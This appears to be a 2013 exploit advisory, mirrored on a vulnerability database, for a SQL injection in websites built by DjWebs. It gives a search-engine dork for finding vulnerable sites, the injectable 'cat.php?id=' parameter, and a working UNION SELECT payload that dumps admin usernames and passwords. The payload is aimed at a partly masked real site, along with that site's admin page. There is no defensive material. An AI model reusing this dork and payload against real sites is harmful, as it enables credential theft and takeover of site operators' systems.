DjWebs SQL injection Vulnerability

2013.04.26
Credit: sil3nt
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:Site Designed by: DjWebs.net inurl:.php?id=

###################################################### # Exploit Title: DjWebs SQL injection Vulnerability # # Exploit Author: Emperor Security Team # # Discovered By : sil3nt # # Home : www.emperor-team.org # # Tested on: Windows xp # # Dork:intext:Site Designed by: DjWebs.net inurl:.php?id= ================================= #Location:site/cat.php?id=[SQL] # # #DEm0:http://www.intXXXnc.com.pk/cat.php?id=-135+union+select+1,group_concat%28username,password%29+from+admin--+ # #Admin page:http://www.inXXXc.com.pk/admin # ##################################### ====================================== * Greetz to: My Lord Allah * Sp Tnx To:MR.F@RDIN-MR.ARTAN-arash281-Mr.Milad * bl4ck.viper-Arash 281-Explo!ter-RZ04-Unline-C4t * Milad22-MR.Vinci-Angel--D3m0n-angola-Hashor ##########################

References:

http://www.emperor-team.org


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top